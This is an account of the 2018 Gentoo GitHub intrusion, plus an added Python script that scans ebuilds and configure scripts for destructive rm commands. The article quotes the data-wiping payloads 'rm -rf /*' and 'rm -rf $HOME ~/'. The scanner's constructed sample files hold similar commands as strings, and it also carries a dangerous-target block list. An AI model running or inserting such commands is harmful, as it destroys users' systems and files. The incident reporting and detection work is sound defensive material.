On June 28th, the GitHub account of the Gentoo Linux project was compromised. The attacker then made extensive changes to Gentoo's code on GitHub, including maliciously adding an rm -rf /* command to the ebuild build scripts. The Gentoo project has now published a detailed incident investigation report:
The attack began at 20:19 on the 28th, when the attacker logged in with an administrator's password. The attacker then created an account with administrative rights and proceeded to remove the legitimate users, including the maintainers. It was this move that exposed the intrusion: the Gentoo project notes that its GitHub organisation is only a mirror, but GitHub notifies users when they are removed from an organisation, so the Gentoo project began investigating the matter at 20:29.
The attacker began modifying files at 20:34. The report's timeline reads: “20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b. Adds rm -rf /* at the top of every ebuild.” and “21:07 Malicious commit to gentoo/systemd, bf0e0a4d->50e3544d. Payload: slightly obfuscated rm -rf $HOME ~/ at the top of the configure script.” The attacker was somewhat amateurish, and the entire intrusion lasted only an hour.
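As an added example (not code from the Gentoo project or its report), the following Python script scans a tree of ebuilds and configure scripts for the payload shape described above: a recursive, forced rm aimed at /, /* or the user's home directory, including simple variations such as split flags (-r -f), the long --recursive/--force options and a quoted or braced ${HOME}. The package names, file names and file contents of the sample tree are constructed for the demonstration and are not real Gentoo files; the exact obfuscation used in the systemd configure script is not described on the page, so only these plain variants are handled.

```python
"""Scan ebuilds and configure scripts for destructive rm invocations.

Constructed example: the sample files below imitate the payload shape
described in the Gentoo report (rm -rf /* at the top of an ebuild, a
recursive rm of $HOME in a configure script); they are not real Gentoo files.
"""
import re
import tempfile
from pathlib import Path

# "rm" (also /bin/rm) followed by one or more dash-prefixed flag words and a first target.
RM_CMD = re.compile(r"(?<![\w.-])rm((?:\s+-[\w-]+)+)\s+(\S+)")

# Targets whose recursive, forced removal destroys the host or the user's home.
DANGEROUS_TARGETS = {
    "/", "/*", "~", "~/", "~/*",
    "$HOME", "$HOME/", "$HOME/*", "${HOME}", "${HOME}/", "${HOME}/*",
}


def _rm_flags(tokens):
    """Return (recursive, force) for rm's flag tokens, long or short, split or combined."""
    recursive = force = False
    for tok in tokens:
        if tok == "--recursive":
            recursive = True
        elif tok == "--force":
            force = True
        elif tok.startswith("-") and not tok.startswith("--"):
            recursive = recursive or "r" in tok or "R" in tok
            force = force or "f" in tok
    return recursive, force


def find_destructive_rm(text):
    """Return (line_no, line) for each rm that is recursive, forced and aimed at a dangerous target."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # drop trailing shell comments (rough, fine for scanning)
        for m in RM_CMD.finditer(code):
            recursive, force = _rm_flags(m.group(1).split())
            target = m.group(2).strip("\"'")  # "${HOME}" -> ${HOME}
            if recursive and force and target in DANGEROUS_TARGETS:
                hits.append((no, line.strip()))
    return hits


def scan_tree(root):
    """Map relative path -> hits for every *.ebuild and configure script under root."""
    root = Path(root)
    results = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix == ".ebuild" or path.name == "configure"):
            hits = find_destructive_rm(path.read_text(errors="replace"))
            if hits:
                results[path.relative_to(root).as_posix()] = hits
    return results


# Constructed sample files (not real Gentoo packages).
MALICIOUS_EBUILD = """\
rm -rf /*
# Copyright 1999-2018 Gentoo Foundation
EAPI=6
DESCRIPTION="constructed sample package"
src_install() {
    rm -rf "${D}"/usr/share/doc/junk
}
"""
MALICIOUS_CONFIGURE = """\
#!/bin/sh
rm -r -f "${HOME}" ~/
echo "checking for gcc..."
"""
BENIGN_EBUILD = """\
EAPI=6
src_install() {
    rm -rf "${D}"/usr/share/doc/junk
    rm -f "${ED}"/usr/lib/libfoo.la
}
"""
SAMPLE_TREE = {
    "app-misc/evil/evil-1.0.ebuild": MALICIOUS_EBUILD,
    "sys-apps/evil-src/configure": MALICIOUS_CONFIGURE,
    "app-misc/clean/clean-1.0.ebuild": BENIGN_EBUILD,
}


def demo():
    """Write the constructed tree into a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_TREE.items():
            path = Path(tmp, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        for no, line in hits:
            print(f"{rel}:{no}: {line}")
```

The benign ebuild shows why the scan keys on the target and not just on `rm -rf`: removing paths under `${D}` is routine in an ebuild and must not be flagged. Note that `rm -rf /*` is not stopped by GNU rm's default --preserve-root, because the shell expands the glob before rm sees it and the root directory itself is never named on the command line. A content scan like this is a cheap check for a mirror whose history has been rewritten, but it is no substitute for verifying the mirror's commits against the canonical repository it is supposed to track.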